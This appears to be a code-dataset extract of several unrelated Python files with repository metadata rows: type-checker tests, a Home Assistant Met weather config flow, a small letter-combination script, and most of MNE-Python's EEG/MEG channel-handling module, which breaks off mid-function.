assert float_val.is_value_compatible(TypedValue(int))
assert not float_val.is_value_compatible(TypedValue(str))
assert float_val.is_value_compatible(TypedValue(value.mock.Mock))
assert not float_val.is_value_compatible(SubclassValue(float))
assert TypedValue(type).is_value_compatible(SubclassValue(float))
def test_subclass_value():
val = SubclassValue(int)
assert val.is_value_compatible(KnownValue(int))
assert val.is_value_compatible(KnownValue(bool))
assert not val.is_value_compatible(KnownValue(str))
assert val.is_value_compatible(TypedValue(type))
assert not val.is_value_compatible(TypedValue(int))
assert val.is_value_compatible(SubclassValue(bool))
assert not val.is_value_compatible(SubclassValue(str))
def test_generic_value():
val = value.GenericValue(list, [TypedValue(int)])
assert_eq("list[int]", str(val))
assert val.is_value_compatible(TypedValue(list))
assert val.is_value_compatible(value.GenericValue(list, [value.UNRESOLVED_VALUE]))
assert val.is_value_compatible(value.GenericValue(list, [TypedValue(bool)]))
assert not val.is_value_compatible(value.GenericValue(list, [TypedValue(str)]))
assert not val.is_value_compatible(value.GenericValue(set, [TypedValue(int)]))
assert_eq("tuple[int, ...]", str(value.GenericValue(tuple, [TypedValue(int)])))
def test_sequence_incomplete_value():
val = value.SequenceIncompleteValue(tuple, [TypedValue(int), TypedValue(str)])
assert_eq("tuple[int, str]", str(val))
assert val.is_value_compatible(TypedValue(tuple))
assert val.is_value_compatible(
value.GenericValue(
tuple, [MultiValuedValue([TypedValue(int), TypedValue(str)])]
)
)
assert not val.is_value_compatible(
value.GenericValue(
tuple, [MultiValuedValue([TypedValue(int), TypedValue(list)])]
)
)
assert val.is_value_compatible(val)
assert not val.is_value_compatible(
value.SequenceIncompleteValue(tuple, [TypedValue(int)])
)
assert val.is_value_compatible(
value.SequenceIncompleteValue(tuple, [TypedValue(bool), TypedValue(str)])
)
def test_multi_valued_value():
val = MultiValuedValue([TypedValue(int), KnownValue(None)])
assert_eq("Union[int, None]", str(val))
assert val.is_value_compatible(KnownValue(1))
assert val.is_value_compatible(KnownValue(None))
assert not val.is_value_compatible(KnownValue(""))
assert not val.is_value_compatible(TypedValue(float))
assert val.is_value_compatible(val)
assert not val.is_value_compatible(
MultiValuedValue([KnownValue(None), TypedValue(str)])
)
assert val.is_value_compatible(
MultiValuedValue(
[
value.UNRESOLVED_VALUE,
MultiValuedValue([TypedValue(int), KnownValue(None)]),
]
)
)
class ThriftEnum(object):
X = 0
Y = 1
_VALUES_TO_NAMES = {0: "X", 1: "Y"}
_NAMES_TO_VALUES = {"X": 0, "Y": 1}
def test_is_value_compatible_thrift_enum():
val = TypedValue(ThriftEnum)
assert val.is_value_compatible(KnownValue(0))
assert not val.is_value_compatible(KnownValue(2))
assert not val.is_value_compatible(KnownValue(1.0))
assert val.is_value_compatible(TypedValue(int))
assert val.is_value_compatible(TypedValue(ThriftEnum))
assert not val.is_value_compatible(TypedValue(str))
def test_subclass_value():
val = value.SubclassValue(str)
assert_eq("Type[str]", str(val))
assert_is(str, val.typ)
assert val.is_type(str)
assert not val.is_type(int)
def test_variable_name_value():
uid_val = value.VariableNameValue(["uid", "viewer"])
varname_map = {
"uid": uid_val,
"viewer": uid_val,
"actor_id": value.VariableNameValue(["actor_id"]),
}
assert_is(None, value.VariableNameValue.from_varname("capybaras", varname_map))
val = value.VariableNameValue.from_varname("uid", varname_map)
assert_is(val, value.VariableNameValue.from_varname("viewer", varname_map))
assert_is(val, value.VariableNameValue.from_varname("old_uid", varname_map))
assert_is_not(val, value.VariableNameValue.from_varname("actor_id", varname_map))
def test_typeddict_value():
val = value.TypedDictValue({"a": TypedValue(int), "b": TypedValue(str)})
# dict iteration order in some Python versions is not deterministic
assert_in(
str(val), ['TypedDict({"a": int, "b": str})', 'TypedDict({"b": str, "a": int})']
)
assert val.is_value_compatible(value.UNRESOLVED_VALUE)
assert val.is_value_compatible(TypedValue(dict))
assert not val.is_value_compatible(TypedValue(str))
# KnownValue of dict
assert val.is_value_compatible(KnownValue({"a": 1, "b": "2"}))
# extra keys are ok
assert val.is_value_compatible(KnownValue({"a": 1, "b": "2", "c": 1}))
# missing key
assert not val.is_value_compatible(KnownValue({"a": 1}))
# wrong type
assert not val.is_value_compatible(KnownValue({"a": 1, "b": 2}))
# TypedDictValue
assert val.is_value_compatible(val)
assert val.is_value_compatible(
value.TypedDictValue({"a": KnownValue(1), "b": TypedValue(str)})
)
assert val.is_value_compatible(
value.TypedDictValue(
{"a": KnownValue(1), "b": TypedValue(str), "c": TypedValue(float)}
)
)
assert not val.is_value_compatible(
value.TypedDictValue({"a": KnownValue(1), "b": TypedValue(int)})
)
assert not val.is_value_compatible(value.TypedDictValue({"b": TypedValue(str)}))
# DictIncompleteValue
assert val.is_value_compatible(
value.DictIncompleteValue(
[(KnownValue("a"), TypedValue(int)), (KnownValue("b"), TypedValue(str))]
)
)
assert val.is_value_compatible(
value.DictIncompleteValue(
[
(KnownValue("a"), TypedValue(int)),
(KnownValue("b"), TypedValue(str)),
(KnownValue("c"), value.UNRESOLVED_VALUE),
]
)
)
assert val.is_value_compatible(
value.DictIncompleteValue(
[
(KnownValue("a"), TypedValue(int)),
(value.UNRESOLVED_VALUE, TypedValue(str)),
]
)
)
assert not val.is_value_compatible(
value.DictIncompleteValue([(value.UNRESOLVED_VALUE, TypedValue(str))])
)
assert not val.is_value_compatible(
value.DictIncompleteValue(
[(KnownValue("a"), TypedValue(int)), (KnownValue("b"), TypedValue(float))]
)
)
@skip_before((3, 5))
def test_new_type_value():
from typing import NewType
nt1 = NewType("nt1", int)
nt1_val = value.NewTypeValue(nt1)
nt2 = NewType("nt2", int)
nt2_val = value.NewTypeValue(nt2)
assert not nt1_val.is_value_compatible(nt2_val)
# This should eventually return False
assert nt1_val.is_value_compatible(TypedValue(int))
assert TypedValue(int).is_value_compatible(nt1_val)
| 35.819788 | 88 | 0.702377 |
795ba57d9887b20be8c07af6c6c3fe3480a9798d | 2,411 | py | Python | homeassistant/components/met/config_flow.py | alemuro/home-assistant | 9b1315d8e55f0ca906c4c8a1b2ae8c2ea511dc90 | [
"Apache-2.0"
] | 2 | 2019-10-19T15:07:32.000Z | 2022-01-29T10:33:20.000Z | homeassistant/components/met/config_flow.py | alemuro/home-assistant | 9b1315d8e55f0ca906c4c8a1b2ae8c2ea511dc90 | [
"Apache-2.0"
] | 4 | 2021-02-08T21:05:14.000Z | 2021-09-08T02:57:03.000Z | homeassistant/components/met/config_flow.py | alemuro/home-assistant | 9b1315d8e55f0ca906c4c8a1b2ae8c2ea511dc90 | [
"Apache-2.0"
] | 1 | 2019-10-04T13:26:54.000Z | 2019-10-04T13:26:54.000Z | """Config flow to configure Met component."""
import voluptuous as vol
from homeassistant import config_entries
from homeassistant.const import CONF_ELEVATION, CONF_LATITUDE, CONF_LONGITUDE, CONF_NAME
from homeassistant.core import callback
import homeassistant.helpers.config_validation as cv
from .const import DOMAIN, HOME_LOCATION_NAME, CONF_TRACK_HOME
@callback
def configured_instances(hass):
"""Return a set of configured SimpliSafe instances."""
return set(
entry.data[CONF_NAME] for entry in hass.config_entries.async_entries(DOMAIN)
)
class MetFlowHandler(config_entries.ConfigFlow, domain=DOMAIN):
"""Config flow for Met component."""
VERSION = 1
CONNECTION_CLASS = config_entries.CONN_CLASS_CLOUD_POLL
def __init__(self):
"""Init MetFlowHandler."""
self._errors = {}
async def async_step_user(self, user_input=None):
"""Handle a flow initialized by the user."""
self._errors = {}
if user_input is not None:
if user_input[CONF_NAME] not in configured_instances(self.hass):
return self.async_create_entry(
title=user_input[CONF_NAME], data=user_input
)
self._errors[CONF_NAME] = "name_exists"
return await self._show_config_form(
name=HOME_LOCATION_NAME,
latitude=self.hass.config.latitude,
longitude=self.hass.config.longitude,
elevation=self.hass.config.elevation,
)
async def _show_config_form(
self, name=None, latitude=None, longitude=None, elevation=None
):
"""Show the configuration form to edit location data."""
return self.async_show_form(
step_id="user",
data_schema=vol.Schema(
{
vol.Required(CONF_NAME, default=name): str,
vol.Required(CONF_LATITUDE, default=latitude): cv.latitude,
vol.Required(CONF_LONGITUDE, default=longitude): cv.longitude,
vol.Required(CONF_ELEVATION, default=elevation): int,
}
),
errors=self._errors,
)
async def async_step_onboarding(self, data=None):
"""Handle a flow initialized by onboarding."""
return self.async_create_entry(
title=HOME_LOCATION_NAME, data={CONF_TRACK_HOME: True}
)
| 33.957746 | 88 | 0.64662 |
795ba64d85385384e85132135b8e9ad2f53906ed | 193 | py | Python | source/approximate/hash_collisions/generate_strings.py | kunalghosh/T-61.5060-Algorithmic-Methods-of-Data-Mining | 718b1ca4a3f83f1b244bb7ddeb5cc430b2967516 | [
"MIT"
] | null | null | null | source/approximate/hash_collisions/generate_strings.py | kunalghosh/T-61.5060-Algorithmic-Methods-of-Data-Mining | 718b1ca4a3f83f1b244bb7ddeb5cc430b2967516 | [
"MIT"
] | null | null | null | source/approximate/hash_collisions/generate_strings.py | kunalghosh/T-61.5060-Algorithmic-Methods-of-Data-Mining | 718b1ca4a3f83f1b244bb7ddeb5cc430b2967516 | [
"MIT"
] | null | null | null | import string
import itertools
import sys
combos = 3
if len(sys.argv) == 2:
combos = int(sys.argv[1])
for a in itertools.combinations(string.ascii_letters,combos):
print "-".join(a)
| 16.083333 | 61 | 0.699482 |
795ba720fe704388b6d6b8dc2bd3ed9e24112748 | 52,659 | py | Python | mne/channels/channels.py | jasmainak/mne-python | 039cb1bf52770019bd48ac028795af0861792fa2 | [
"BSD-3-Clause"
] | null | null | null | mne/channels/channels.py | jasmainak/mne-python | 039cb1bf52770019bd48ac028795af0861792fa2 | [
"BSD-3-Clause"
] | 2 | 2016-02-27T13:43:15.000Z | 2018-07-18T19:44:45.000Z | mne/channels/channels.py | jasmainak/mne-python | 039cb1bf52770019bd48ac028795af0861792fa2 | [
"BSD-3-Clause"
] | 1 | 2017-03-05T20:44:07.000Z | 2017-03-05T20:44:07.000Z | # Authors: Alexandre Gramfort <alexandre.gramfort@telecom-paristech.fr>
# Matti Hamalainen <msh@nmr.mgh.harvard.edu>
# Denis Engemann <denis.engemann@gmail.com>
# Andrew Dykstra <andrew.r.dykstra@gmail.com>
# Teon Brooks <teon.brooks@gmail.com>
#
# License: BSD (3-clause)
import os
import os.path as op
import numpy as np
from scipy import sparse
from ..externals.six import string_types
from ..utils import verbose, logger, warn, copy_function_doc_to_method_doc
from ..utils import _check_preload, _validate_type
from ..io.compensator import get_current_comp
from ..io.constants import FIFF
from ..io.meas_info import anonymize_info, Info
from ..io.pick import (channel_type, pick_info, pick_types, _picks_by_type,
_check_excludes_includes, _PICK_TYPES_KEYS,
channel_indices_by_type, pick_channels)
def _get_meg_system(info):
"""Educated guess for the helmet type based on channels."""
system = '306m'
for ch in info['chs']:
if ch['kind'] == FIFF.FIFFV_MEG_CH:
# Only take first 16 bits, as higher bits store CTF grad comp order
coil_type = ch['coil_type'] & 0xFFFF
if coil_type == FIFF.FIFFV_COIL_NM_122:
system = '122m'
break
elif coil_type // 1000 == 3: # All Vectorview coils are 30xx
system = '306m'
break
elif (coil_type == FIFF.FIFFV_COIL_MAGNES_MAG or
coil_type == FIFF.FIFFV_COIL_MAGNES_GRAD):
nmag = np.sum([c['kind'] == FIFF.FIFFV_MEG_CH
for c in info['chs']])
system = 'Magnes_3600wh' if nmag > 150 else 'Magnes_2500wh'
break
elif coil_type == FIFF.FIFFV_COIL_CTF_GRAD:
system = 'CTF_275'
break
elif coil_type == FIFF.FIFFV_COIL_KIT_GRAD:
system = 'KIT'
break
elif coil_type == FIFF.FIFFV_COIL_BABY_GRAD:
system = 'BabySQUID'
break
elif coil_type == FIFF.FIFFV_COIL_ARTEMIS123_GRAD:
system = 'ARTEMIS123'
break
return system
def _contains_ch_type(info, ch_type):
"""Check whether a certain channel type is in an info object.
Parameters
----------
info : instance of Info
The measurement information.
ch_type : str
the channel type to be checked for
Returns
-------
has_ch_type : bool
Whether the channel type is present or not.
"""
_validate_type(ch_type, 'str', "ch_type")
meg_extras = ['mag', 'grad', 'planar1', 'planar2']
fnirs_extras = ['hbo', 'hbr']
valid_channel_types = sorted([key for key in _PICK_TYPES_KEYS
if key != 'meg'] + meg_extras + fnirs_extras)
if ch_type not in valid_channel_types:
raise ValueError('ch_type must be one of %s, not "%s"'
% (valid_channel_types, ch_type))
if info is None:
raise ValueError('Cannot check for channels of type "%s" because info '
'is None' % (ch_type,))
return ch_type in [channel_type(info, ii) for ii in range(info['nchan'])]
def _get_ch_type(inst, ch_type):
"""Choose a single channel type (usually for plotting).
Usually used in plotting to plot a single datatype, e.g. look for mags,
then grads, then ... to plot.
"""
if ch_type is None:
for type_ in ['mag', 'grad', 'planar1', 'planar2', 'eeg']:
if isinstance(inst, Info):
if _contains_ch_type(inst, type_):
ch_type = type_
break
elif type_ in inst:
ch_type = type_
break
else:
raise RuntimeError('No plottable channel types found')
return ch_type
@verbose
def equalize_channels(candidates, verbose=None):
"""Equalize channel picks for a collection of MNE-Python objects.
Parameters
----------
candidates : list
list Raw | Epochs | Evoked | AverageTFR
verbose : bool, str, int, or None
If not None, override default verbose level (see :func:`mne.verbose`
and :ref:`Logging documentation <tut_logging>` for more).
Notes
-----
This function operates inplace.
"""
from ..io.base import BaseRaw
from ..epochs import BaseEpochs
from ..evoked import Evoked
from ..time_frequency import _BaseTFR
for candidate in candidates:
_validate_type(candidate,
(BaseRaw, BaseEpochs, Evoked, _BaseTFR),
"Instances to be modified",
"Raw, Epochs, Evoked or TFR")
chan_max_idx = np.argmax([c.info['nchan'] for c in candidates])
chan_template = candidates[chan_max_idx].ch_names
logger.info('Identifying common channels ...')
channels = [set(c.ch_names) for c in candidates]
common_channels = set(chan_template).intersection(*channels)
dropped = list()
for c in candidates:
drop_them = list(set(c.ch_names) - common_channels)
if drop_them:
c.drop_channels(drop_them)
dropped.extend(drop_them)
if dropped:
dropped = list(set(dropped))
logger.info('Dropped the following channels:\n%s' % dropped)
else:
logger.info('all channels are corresponding, nothing to do.')
class ContainsMixin(object):
"""Mixin class for Raw, Evoked, Epochs."""
def __contains__(self, ch_type):
"""Check channel type membership.
Parameters
----------
ch_type : str
Channel type to check for. Can be e.g. 'meg', 'eeg', 'stim', etc.
Returns
-------
in : bool
Whether or not the instance contains the given channel type.
Examples
--------
Channel type membership can be tested as::
>>> 'meg' in inst # doctest: +SKIP
True
>>> 'seeg' in inst # doctest: +SKIP
False
"""
if ch_type == 'meg':
has_ch_type = (_contains_ch_type(self.info, 'mag') or
_contains_ch_type(self.info, 'grad'))
else:
has_ch_type = _contains_ch_type(self.info, ch_type)
return has_ch_type
@property
def compensation_grade(self):
"""The current gradient compensation grade."""
return get_current_comp(self.info)
# XXX Eventually de-duplicate with _kind_dict of mne/io/meas_info.py
_human2fiff = {'ecg': FIFF.FIFFV_ECG_CH,
'eeg': FIFF.FIFFV_EEG_CH,
'emg': FIFF.FIFFV_EMG_CH,
'eog': FIFF.FIFFV_EOG_CH,
'exci': FIFF.FIFFV_EXCI_CH,
'ias': FIFF.FIFFV_IAS_CH,
'misc': FIFF.FIFFV_MISC_CH,
'resp': FIFF.FIFFV_RESP_CH,
'seeg': FIFF.FIFFV_SEEG_CH,
'stim': FIFF.FIFFV_STIM_CH,
'syst': FIFF.FIFFV_SYST_CH,
'bio': FIFF.FIFFV_BIO_CH,
'ecog': FIFF.FIFFV_ECOG_CH,
'hbo': FIFF.FIFFV_FNIRS_CH,
'hbr': FIFF.FIFFV_FNIRS_CH}
_human2unit = {'ecg': FIFF.FIFF_UNIT_V,
'eeg': FIFF.FIFF_UNIT_V,
'emg': FIFF.FIFF_UNIT_V,
'eog': FIFF.FIFF_UNIT_V,
'exci': FIFF.FIFF_UNIT_NONE,
'ias': FIFF.FIFF_UNIT_NONE,
'misc': FIFF.FIFF_UNIT_V,
'resp': FIFF.FIFF_UNIT_NONE,
'seeg': FIFF.FIFF_UNIT_V,
'stim': FIFF.FIFF_UNIT_NONE,
'syst': FIFF.FIFF_UNIT_NONE,
'bio': FIFF.FIFF_UNIT_V,
'ecog': FIFF.FIFF_UNIT_V,
'hbo': FIFF.FIFF_UNIT_MOL,
'hbr': FIFF.FIFF_UNIT_MOL}
_unit2human = {FIFF.FIFF_UNIT_V: 'V',
FIFF.FIFF_UNIT_T: 'T',
FIFF.FIFF_UNIT_T_M: 'T/m',
FIFF.FIFF_UNIT_MOL: 'M',
FIFF.FIFF_UNIT_NONE: 'NA'}
def _check_set(ch, projs, ch_type):
"""Ensure type change is compatible with projectors."""
new_kind = _human2fiff[ch_type]
if ch['kind'] != new_kind:
for proj in projs:
if ch['ch_name'] in proj['data']['col_names']:
raise RuntimeError('Cannot change channel type for channel %s '
'in projector "%s"'
% (ch['ch_name'], proj['desc']))
ch['kind'] = new_kind
class SetChannelsMixin(object):
"""Mixin class for Raw, Evoked, Epochs."""
@verbose
def set_eeg_reference(self, ref_channels='average', projection=False,
verbose=None):
"""Specify which reference to use for EEG data.
By default, MNE-Python will automatically re-reference the EEG signal
to use an average reference (see below). Use this function to
explicitly specify the desired reference for EEG. This can be either an
existing electrode or a new virtual channel. This function will
re-reference the data according to the desired reference and prevent
MNE-Python from automatically adding an average reference projection.
Some common referencing schemes and the corresponding value for the
``ref_channels`` parameter:
No re-referencing:
If the EEG data is already using the proper reference, set
``ref_channels=[]``. This will prevent MNE-Python from
automatically adding an average reference projection.
Average reference:
A new virtual reference electrode is created by averaging the
current EEG signal by setting ``ref_channels='average'``. Bad EEG
channels are automatically excluded if they are properly set in
``info['bads']``.
A single electrode:
Set ``ref_channels`` to a list containing the name of the channel
that will act as the new reference, for example
``ref_channels=['Cz']``.
The mean of multiple electrodes:
A new virtual reference electrode is created by computing the
average of the current EEG signal recorded from two or more
selected channels. Set ``ref_channels`` to a list of channel names,
indicating which channels to use. For example, to apply an average
mastoid reference, when using the 10-20 naming scheme, set
``ref_channels=['M1', 'M2']``.
Parameters
----------
ref_channels : list of str | str
The name(s) of the channel(s) used to construct the reference. To
apply an average reference, specify ``'average'`` here (default).
If an empty list is specified, the data is assumed to already have
a proper reference and MNE will not attempt any re-referencing of
the data. Defaults to an average reference.
projection : bool
If ``ref_channels='average'`` this argument specifies if the
average reference should be computed as a projection (True) or not
(False; default). If ``projection=True``, the average reference is
added as a projection and is not applied to the data (it can be
applied afterwards with the ``apply_proj`` method). If
``projection=False``, the average reference is directly applied to
the data. If ``ref_channels`` is not ``'average'``, ``projection``
must be set to ``False`` (the default in this case).
verbose : bool, str, int, or None
If not None, override default verbose level (see
:func:`mne.verbose` and :ref:`Logging documentation <tut_logging>`
for more).
Returns
-------
inst : instance of Raw | Epochs | Evoked
Data with EEG channels re-referenced. If ``ref_channels='average'``
and ``projection=True`` a projection will be added instead of
directly re-referencing the data.
See Also
--------
mne.set_bipolar_reference : Convenience function for creating bipolar
references.
Notes
-----
1. If a reference is requested that is not the average reference, this
function removes any pre-existing average reference projections.
2. During source localization, the EEG signal should have an average
reference.
3. In order to apply a reference, the data must be preloaded. This is
not necessary if ``ref_channels='average'`` and ``projection=True``.
4. For an average reference, bad EEG channels are automatically
excluded if they are properly set in ``info['bads']``.
.. versionadded:: 0.9.0
"""
from ..io.reference import set_eeg_reference
return set_eeg_reference(self, ref_channels=ref_channels, copy=False,
projection=projection)[0]
def _get_channel_positions(self, picks=None):
"""Get channel locations from info.
Parameters
----------
picks : array-like of int | None
Indices of channels to include. If None (default), all meg and eeg
channels that are available are returned (bad channels excluded).
Notes
-----
.. versionadded:: 0.9.0
"""
if picks is None:
picks = pick_types(self.info, meg=True, eeg=True)
chs = self.info['chs']
pos = np.array([chs[k]['loc'][:3] for k in picks])
n_zero = np.sum(np.sum(np.abs(pos), axis=1) == 0)
if n_zero > 1: # XXX some systems have origin (0, 0, 0)
raise ValueError('Could not extract channel positions for '
'{} channels'.format(n_zero))
return pos
def _set_channel_positions(self, pos, names):
"""Update channel locations in info.
Parameters
----------
pos : array-like | np.ndarray, shape (n_points, 3)
The channel positions to be set.
names : list of str
The names of the channels to be set.
Notes
-----
.. versionadded:: 0.9.0
"""
if len(pos) != len(names):
raise ValueError('Number of channel positions not equal to '
'the number of names given.')
pos = np.asarray(pos, dtype=np.float)
if pos.shape[-1] != 3 or pos.ndim != 2:
msg = ('Channel positions must have the shape (n_points, 3) '
'not %s.' % (pos.shape,))
raise ValueError(msg)
for name, p in zip(names, pos):
if name in self.ch_names:
idx = self.ch_names.index(name)
self.info['chs'][idx]['loc'][:3] = p
else:
msg = ('%s was not found in the info. Cannot be updated.'
% name)
raise ValueError(msg)
def set_channel_types(self, mapping):
"""Define the sensor type of channels.
Note: The following sensor types are accepted:
ecg, eeg, emg, eog, exci, ias, misc, resp, seeg, stim, syst, ecog,
hbo, hbr
Parameters
----------
mapping : dict
a dictionary mapping a channel to a sensor type (str)
{'EEG061': 'eog'}.
Notes
-----
.. versionadded:: 0.9.0
"""
ch_names = self.info['ch_names']
# first check and assemble clean mappings of index and name
unit_changes = dict()
for ch_name, ch_type in mapping.items():
if ch_name not in ch_names:
raise ValueError("This channel name (%s) doesn't exist in "
"info." % ch_name)
c_ind = ch_names.index(ch_name)
if ch_type not in _human2fiff:
raise ValueError('This function cannot change to this '
'channel type: %s. Accepted channel types '
'are %s.'
% (ch_type,
", ".join(sorted(_human2unit.keys()))))
# Set sensor type
_check_set(self.info['chs'][c_ind], self.info['projs'], ch_type)
unit_old = self.info['chs'][c_ind]['unit']
unit_new = _human2unit[ch_type]
if unit_old not in _unit2human:
raise ValueError("Channel '%s' has unknown unit (%s). Please "
"fix the measurement info of your data."
% (ch_name, unit_old))
if unit_old != _human2unit[ch_type]:
this_change = (_unit2human[unit_old], _unit2human[unit_new])
if this_change not in unit_changes:
unit_changes[this_change] = list()
unit_changes[this_change].append(ch_name)
self.info['chs'][c_ind]['unit'] = _human2unit[ch_type]
if ch_type in ['eeg', 'seeg', 'ecog']:
coil_type = FIFF.FIFFV_COIL_EEG
elif ch_type == 'hbo':
coil_type = FIFF.FIFFV_COIL_FNIRS_HBO
elif ch_type == 'hbr':
coil_type = FIFF.FIFFV_COIL_FNIRS_HBR
else:
coil_type = FIFF.FIFFV_COIL_NONE
self.info['chs'][c_ind]['coil_type'] = coil_type
msg = "The unit for channel(s) {0} has changed from {1} to {2}."
for this_change, names in unit_changes.items():
warn(msg.format(", ".join(sorted(names)), *this_change))
def rename_channels(self, mapping):
"""Rename channels.
Parameters
----------
mapping : dict | callable
a dictionary mapping the old channel to a new channel name
e.g. {'EEG061' : 'EEG161'}. Can also be a callable function
that takes and returns a string (new in version 0.10.0).
Notes
-----
.. versionadded:: 0.9.0
"""
rename_channels(self.info, mapping)
@verbose
def set_montage(self, montage, set_dig=True, verbose=None):
"""Set EEG sensor configuration and head digitization.
Parameters
----------
montage : instance of Montage | instance of DigMontage | str | None
The montage to use (None removes any location information).
set_dig : bool
If True, update the digitization information (``info['dig']``)
in addition to the channel positions (``info['chs'][idx]['loc']``).
.. versionadded: 0.15
verbose : bool, str, int, or None
If not None, override default verbose level (see
:func:`mne.verbose` and :ref:`Logging documentation <tut_logging>`
for more).
Notes
-----
Operates in place.
.. versionadded:: 0.9.0
"""
from .montage import _set_montage
_set_montage(self.info, montage, set_dig=set_dig)
return self
def plot_sensors(self, kind='topomap', ch_type=None, title=None,
show_names=False, ch_groups=None, to_sphere=True,
axes=None, block=False, show=True):
"""Plot sensor positions.
Parameters
----------
kind : str
Whether to plot the sensors as 3d, topomap or as an interactive
sensor selection dialog. Available options 'topomap', '3d',
'select'. If 'select', a set of channels can be selected
interactively by using lasso selector or clicking while holding
control key. The selected channels are returned along with the
figure instance. Defaults to 'topomap'.
ch_type : None | str
The channel type to plot. Available options 'mag', 'grad', 'eeg',
'seeg', 'ecog', 'all'. If ``'all'``, all the available mag, grad,
eeg, seeg and ecog channels are plotted. If None (default), then
channels are chosen in the order given above.
title : str | None
Title for the figure. If None (default), equals to ``'Sensor
positions (%s)' % ch_type``.
show_names : bool | array of str
Whether to display all channel names. If an array, only the channel
names in the array are shown. Defaults to False.
ch_groups : 'position' | array of shape (ch_groups, picks) | None
Channel groups for coloring the sensors. If None (default), default
coloring scheme is used. If 'position', the sensors are divided
into 8 regions. See ``order`` kwarg of :func:`mne.viz.plot_raw`. If
array, the channels are divided by picks given in the array.
.. versionadded:: 0.13.0
to_sphere : bool
Whether to project the 3d locations to a sphere. When False, the
sensor array appears similar as to looking downwards straight above
the subject's head. Has no effect when kind='3d'. Defaults to True.
.. versionadded:: 0.14.0
axes : instance of Axes | instance of Axes3D | None
Axes to draw the sensors to. If ``kind='3d'``, axes must be an
instance of Axes3D. If None (default), a new axes will be created.
.. versionadded:: 0.13.0
block : bool
Whether to halt program execution until the figure is closed.
Defaults to False.
.. versionadded:: 0.13.0
show : bool
Show figure if True. Defaults to True.
Returns
-------
fig : instance of matplotlib figure
Figure containing the sensor topography.
selection : list
A list of selected channels. Only returned if ``kind=='select'``.
See Also
--------
mne.viz.plot_layout
Notes
-----
This function plots the sensor locations from the info structure using
matplotlib. For drawing the sensors using mayavi see
:func:`mne.viz.plot_alignment`.
.. versionadded:: 0.12.0
"""
from ..viz.utils import plot_sensors
return plot_sensors(self.info, kind=kind, ch_type=ch_type, title=title,
show_names=show_names, ch_groups=ch_groups,
to_sphere=to_sphere, axes=axes, block=block,
show=show)
@copy_function_doc_to_method_doc(anonymize_info)
def anonymize(self):
"""
.. versionadded:: 0.13.0
"""
anonymize_info(self.info)
return self
class UpdateChannelsMixin(object):
"""Mixin class for Raw, Evoked, Epochs, AverageTFR."""
@verbose
def pick_types(self, meg=True, eeg=False, stim=False, eog=False,
ecg=False, emg=False, ref_meg='auto', misc=False,
resp=False, chpi=False, exci=False, ias=False, syst=False,
seeg=False, dipole=False, gof=False, bio=False, ecog=False,
fnirs=False, include=(), exclude='bads', selection=None,
verbose=None):
"""Pick some channels by type and names.
Parameters
----------
meg : bool | str
If True include all MEG channels. If False include None
If string it can be 'mag', 'grad', 'planar1' or 'planar2' to select
only magnetometers, all gradiometers, or a specific type of
gradiometer.
eeg : bool
If True include EEG channels.
stim : bool
If True include stimulus channels.
eog : bool
If True include EOG channels.
ecg : bool
If True include ECG channels.
emg : bool
If True include EMG channels.
ref_meg: bool | str
If True include CTF / 4D reference channels. If 'auto', the
reference channels are only included if compensations are present.
misc : bool
If True include miscellaneous analog channels.
resp : bool
If True include response-trigger channel. For some MEG systems this
is separate from the stim channel.
chpi : bool
If True include continuous HPI coil channels.
exci : bool
Flux excitation channel used to be a stimulus channel.
ias : bool
Internal Active Shielding data (maybe on Triux only).
syst : bool
System status channel information (on Triux systems only).
seeg : bool
Stereotactic EEG channels.
dipole : bool
Dipole time course channels.
gof : bool
Dipole goodness of fit channels.
bio : bool
Bio channels.
ecog : bool
Electrocorticography channels.
fnirs : bool | str
Functional near-infrared spectroscopy channels. If True include all
fNIRS channels. If False (default) include none. If string it can
be 'hbo' (to include channels measuring oxyhemoglobin) or 'hbr' (to
include channels measuring deoxyhemoglobin).
include : list of string
List of additional channels to include. If empty do not include
any.
exclude : list of string | str
List of channels to exclude. If 'bads' (default), exclude channels
in ``info['bads']``.
selection : list of string
Restrict sensor channels (MEG, EEG) to this list of channel names.
verbose : bool, str, int, or None
If not None, override default verbose level (see
:func:`mne.verbose` and :ref:`Logging documentation <tut_logging>`
for more).
Returns
-------
inst : instance of Raw, Epochs, or Evoked
The modified instance.
See Also
--------
pick_channels
Notes
-----
.. versionadded:: 0.9.0
"""
idx = pick_types(
self.info, meg=meg, eeg=eeg, stim=stim, eog=eog, ecg=ecg, emg=emg,
ref_meg=ref_meg, misc=misc, resp=resp, chpi=chpi, exci=exci,
ias=ias, syst=syst, seeg=seeg, dipole=dipole, gof=gof, bio=bio,
ecog=ecog, fnirs=fnirs, include=include, exclude=exclude,
selection=selection)
return self._pick_drop_channels(idx)
def pick_channels(self, ch_names):
"""Pick some channels.
Parameters
----------
ch_names : list
The list of channels to select.
Returns
-------
inst : instance of Raw, Epochs, or Evoked
The modified instance.
See Also
--------
drop_channels
pick_types
reorder_channels
Notes
-----
The channel names given are assumed to be a set, i.e. the order
does not matter. The original order of the channels is preserved.
You can use ``reorder_channels`` to set channel order if necessary.
.. versionadded:: 0.9.0
"""
return self._pick_drop_channels(
pick_channels(self.info['ch_names'], ch_names))
def reorder_channels(self, ch_names):
"""Reorder channels.
Parameters
----------
ch_names : list
The desired channel order.
Returns
-------
inst : instance of Raw, Epochs, or Evoked
The modified instance.
See Also
--------
drop_channels
pick_types
pick_channels
Notes
-----
Channel names must be unique. Channels that are not in ``ch_names``
are dropped.
.. versionadded:: 0.16.0
"""
_check_excludes_includes(ch_names)
idx = list()
for ch_name in ch_names:
ii = self.ch_names.index(ch_name)
if ii in idx:
raise ValueError('Channel name repeated: %s' % (ch_name,))
idx.append(ii)
return self._pick_drop_channels(idx)
def drop_channels(self, ch_names):
"""Drop some channels.
Parameters
----------
ch_names : list
List of the names of the channels to remove.
Returns
-------
inst : instance of Raw, Epochs, or Evoked
The modified instance.
See Also
--------
reorder_channels
pick_channels
pick_types
Notes
-----
.. versionadded:: 0.9.0
"""
msg = ("'ch_names' should be a list of strings (the name[s] of the "
"channel to be dropped), not a {0}.")
if isinstance(ch_names, string_types):
raise ValueError(msg.format("string"))
else:
if not all([isinstance(ch_name, string_types)
for ch_name in ch_names]):
raise ValueError(msg.format(type(ch_names[0])))
missing = [ch_name for ch_name in ch_names
if ch_name not in self.ch_names]
if len(missing) > 0:
msg = "Channel(s) {0} not found, nothing dropped."
raise ValueError(msg.format(", ".join(missing)))
bad_idx = [self.ch_names.index(ch_name) for ch_name in ch_names
if ch_name in self.ch_names]
idx = np.setdiff1d(np.arange(len(self.ch_names)), bad_idx)
return self._pick_drop_channels(idx)
def _pick_drop_channels(self, idx):
